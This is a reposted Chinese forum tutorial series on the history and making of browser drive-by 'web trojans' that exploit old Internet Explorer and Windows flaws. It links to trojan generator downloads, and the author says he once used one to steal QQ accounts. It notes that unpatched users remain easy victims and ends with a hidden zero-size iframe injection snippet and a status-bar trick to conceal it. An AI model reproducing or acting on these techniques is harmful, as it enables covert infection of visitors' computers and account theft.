网页木马成长日记 - -(转)

主题:网页木马专题之一

　 总有一个想法，想把我多年收集的网页木马有关东东送给大家，只是一是没有时间，二是有些舍不得。不过还是决定了，现在就开始写教程了。从最古老的网页木马开始写起。最古老的网页木马当然是失效了并被杀毒软件查杀的，不过你有兴趣每天来看一下，总会看到最新的。现在来写第一个：
它利用Wsh(Windows Scripting Host Object Reference，简称Wsh，在windows的默认安装时都有的，绝大多数上网用户都没有卸载它) 结合Javascript在你的注册表里动一下手脚，再用服务器端脚本程序像asp、php啦来记录访问者的有关信息，浏览之后，c盘就会不知不觉被完全共享;同时你的ip地址、访问时间、操作系统名称还会被此网页木马所记录。我给出一个我写的网页木马代码(只针对win9x)和简单注释，如下：
为了省去大家输入的麻烦，并且我这个网页会过滤很多东东，所以我把全部代码已经写好，你可以在下载得到这一asp文件
[url]http://www.haiyangtop.net/exe.rar[/url]

主题:网页木马专题之二

　 通过activex控件制做的网页木马。通过 ActiveX 把普通的软件转化为可以在你的主页直接执行的软件的网页木马！ 该网页木马对所有的系统和IE版本都有效，缺点是会在浏览此网页木马是会弹出对话框，询问是否安装此插件。
很多在线工具都是用tegoweb　express来制作完成，能不能运行成功，就要看人是意点签名工具了。
我手头上还有有几个伪造3721、百度签名的网页木马生成器。不过，我从来没用过。下载地址是：
[url]http://www.haiyangtop.net/acrtiv.rar[/url]

主题:网页木马专题之三

　 这个还是利用了wsh修改注册表后，使其IE的“没有标记为安全的的activex控件和插件默认设置改为启用”。然后再利用一些可以本地运行exe的网页代码来运行。虽然这个网页木马已经过时，但是发现ie安全漏洞可以提升权限达到本地运行网页的效果，这是以后众多网页木马制的作的思路。
[url]http://www.haiyangtop.net/m3.rar[/url]

主题:网页木马专题之四

　 今天才可以算是写到了网页木马的开山鼻祖，MIME漏洞制做的网页木马。我第一个做出的网页木马就是他，利用他在当年盗了不少qq号。不过这项技术已经现在已经过时了，因为使用的是IE5.0 IE5.1中MIME/BASE64处理的漏洞，这个漏洞已经在2000-07-13由微软公布了，而且现在所有杀毒软件都可以对其进行查杀，不过因为国内绝大多数的上网用户使用的操作系统都为WIN98，而且几乎没有人打过补丁，经常不升级杀毒软件的大有人在，所以现在使用这个技术依然可以使很多人中招！
在这之后，紧跟着出现了浏览图片就可以中招的网页木马。BMP木马件是把一个EXE文件伪装成一个BMP图片文件,以<img src="mybmp.bmp" >这样的代码放在网页里欺骗IE自动下载,再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录.再编写一个脚本把找到的BMP文件用DEBUG还原成EXE,并把它放到注册表启动项中,在下一次开机时执行.但是这种技术只能在9X下发挥作用,对于2K,XP来说是无能为力了.
再稍后又是exe文件转化成html文件的木马。exe文件转化成htm文件，是为了欺骗访问者访问htm文件从而达到运行exe文件的目的。它和bmp网页木马是运用了同一个原理，不过一个是bmp文件，一个是html文件,最终这个exe文件转换成的html文件也会利用JAVASCRIPT脚本和debug程序恢复原来面目，将自身放在注册表启动项中,在下一次开机时执行。
这三个网页木马当年在网上风靡一时，可以说是真正开启了网页木马的一个时代。这三个网页木马的生成器的下载地址是 
[url]http://www.haiyangtop.net/hack3.rar[/url] 　

主题:网页木马专题之五

　 在木马专题四之后最有名气的当属hta网页木马了。2003年此漏洞就存在了，我在华夏等网站看到仍然有个用这个方法来制作网页木马的教程，如何使之做的网页木马躲过查杀。
hta网页木马就是Internet Explorer Object Data漏洞制做全新网页木马，不了解这个漏洞的可以看一下这篇文章。[url]http://www.haiyang.net/safety/topic.asp?id=356[/url]
在此时，网页木马好像在网上就开始卖钱了，真正让一些人体会到它的价值。
这个网页木马生成器也有很多，我最喜欢mm帝国chin做的一个vbs的生成器。这个网页木马很多人的做法是用exe转bat再debug成exe来执行，所以打开页面时窗口会闪一下。在网上制作不闪烁的网页木马教程都是指的这个。
hta网页木马vbs生成器下载：
[url]http://www.haiyangtop.net/hta.rar[/url]

主题:网页木马专题之六

　 写到第五个专题的时候，我的[url]http://www.haiyangtop.net[/url]的网站暂且打不开了，在这里要感谢提供免费空间的crackl0ve老大。我相信空间很快就好的。
网页木马的系列，不能不提到一个牛人，就是冰狐浪子。我关注网页木马，只是收集而已，而他只要有新的IE漏洞，他都可以做出网页木马来。所以这里提供他以前做的一个网页木马生成器。如果因空间原因不能下载专题四以前的软件，下载这一个基本就包括了
[url]http://www.haiyang.net/safety/muma.exe[/url]

主题:网页木马专题之七

　 Microsoft Internet Explorer window.open搜索格跨域脚本漏洞，这是2004年3月公布的。利用此漏洞制作的网页木马其实不错，网上却不太常见，此网页木马也是匆匆一闪而过。当年冰狐用此漏洞写了篇文章，叫做打造最完美的网页木马，可见此漏洞并不能小瞧。我做了个示例页，在2003未打sp1补丁的情况下仍然测试成功。
冰狐的文章及我做的示例页，及czy以前写过的类似一篇文章放在一起供大家打包下载
[url]http://www.haiyang.net/safety/mm7.rar[/url]

主题:网页木马专题之八

　 在网页木马制作上，当然如果能做到直接执行exe的最好。不过，有一类网页木马是欺骗对方的。像改变url格式，或明明是一个jpg让你点下载，但是打开后却是一个exe。这个例子在这[url]http://www.haiyang.net/safety/lcx.htm[/url]
这个漏洞现在已不存在了，但是本地打开后仍然有效果。另外，风糜一时的@url格式漏洞，我以前也写过一篇文章。
[url]http://www.haiyang.net/safety/ie.rtf[/url]

主题:网页木马专题之九

　 如果说专题八之前写的网页木马，大家已经抛弃了的话，那我相信这个专题九写的网页木马，大家仍然在用。就是chm格式漏洞。做成网页木马后，w2ksp4 ie6.0sp1以下，及xp sp1会全部中招。如果只是做了chm，这个chm在本地打开后，所有系统都会中的。chm网页木马网上有很多个软件生成器了，冰狐的最好用，他也做过多种格式的chm网页木马生成器，大家可以上网找找，这里我提供一种手工制作方法。
[url]http://www.haiyang.net/safety/chm[/url]木马.doc

主题:网页木马专题之十 

　 网页木马基本是针对个个用户的，但是xpsp2一出来后，多数人是用的文字个版本，所以找到一款突破sp2漏洞的木马在一段时间内非常难，不过还是有的。最早突破xpsp2的网页木马就是ms04038漏洞了，这款漏洞包含了多个漏洞，大家有兴趣可以上网找一下。czy当时对用此漏洞做的一个拖放突破xpsp2的网页木马做了一个非常深刻的分析，他的文章我在绿盟有的，我也收集了一个，放在[url]http://www.haiyang.net/safety/ms04038.rar[/url]供大家下载学习研究。
不过多数人与我一样，只是会用网页木马，会改html源码而已，所以这儿也有一个例程，供大家看一下。示例代码地址是[url]http://www.mikx.de/scrollbar/frame.html[/url]

主题:网页木马专题之十一
　 今天来为大家介绍的是一个今年2月份出的突破sp2的网页木马，利用的是hhctrl.ocx漏洞来制作的。在说这个木马之前，也许会有人提示我说，你是不是在这之前漏了、iframe溢出网页木马呀。在时间上来讲,iframe溢出网页木马我的确漏了，不过因为溢出在最近这段时内出了好几个网页木马，我要在最后一起介绍。
网上有很多sp2网页木马，不过多数都是用的冰狐的那个加密脚本改写而成，看不到源码，总有点不爽。
有一篇分析的文章[url]http://shashuang.home4u.china.com/loudong/loudong16.htm[/url]
和动画
[url]http://www.pcshare8.com/SP2[/url]网页木马制作全过程.rar
提供给大家

主题:网页木马专题之十二

是网上出现的溢出型网页木马的介绍。
好像最流行最早的一个溢出型网页木马是iframe溢出。
这个网页木马在[url]http://www.icyfoxlovelace.com/in[/url] ... d=a_20050313_222651
这里有生成器下载。不过冰狐把其它的几个漏洞集成在里边了。
溢出型的网页木马虽然杀伤力比较大，但是有个致命的缺点。会造成ie假死或关掉所有IE进程。冰狐浪子的解决办法是弹出一个窗口再关掉当前的IE进程。
iframe溢出之后就是ms05020的漏洞制作的。
这儿也有生成器下载：
[url]http://soft.hackbase.com/43/20050626/6964.html[/url]
可是，写生成器的作者竟然说成了ms04020。
这个木马会弹两个窗口，在低版本的像w2k sp2上好像还会弹无数窗，效果好像并不好。用iframe之后无法用。
网页木马还有的是利用的第3方软件做的，就是顶有名的replaye网页木马。这份网页木马并不是网上流行的在电影里插网页木马的那种方法，而是利用replayer的漏洞直接运行exe
我在非安全杂志上写了篇介绍如何制做这个网页木马的方法，提供给大家:
[url]http://www.haiyang.net/safety/real.rar[/url]
至于如何改里边的shellcode，变成下载并执行，这个我也不会，我不懂溢出。
最新的一种网页木马就是Microsoft Internet Explorer Javaprxy.DLL COM对象堆溢出漏洞
做的了，这儿有介绍：
[url]http://www.xfocus.net/vuls/200507/4055.html[/url]
邪恶八进制的无敌最寂寞给其改成了反向的代码:
[url]http://www.eviloctal.com/forum/read.php?tid=12314&fpage=2[/url]

主题:网页木马专题之十三 

本想写到十二就不写了，结果又出了个ms05038
[url]http://www.eviloctal.com/forum/read.php?tid=13409&fpage=1[/url]
这里有工具，大家自己去看吧

主题:挂马的一个小技巧 

　 挂马时用的都是<iframe src=http://www.sohu.com/mm.htm width=0 height=0></iframe>这样的源码，但是浏览被挂的时候，状态栏会显示挂马的链接，在mm.htm或被挂的页面加上一句<body onload=window.status="被挂站的网址">可能会好一点点儿。

评论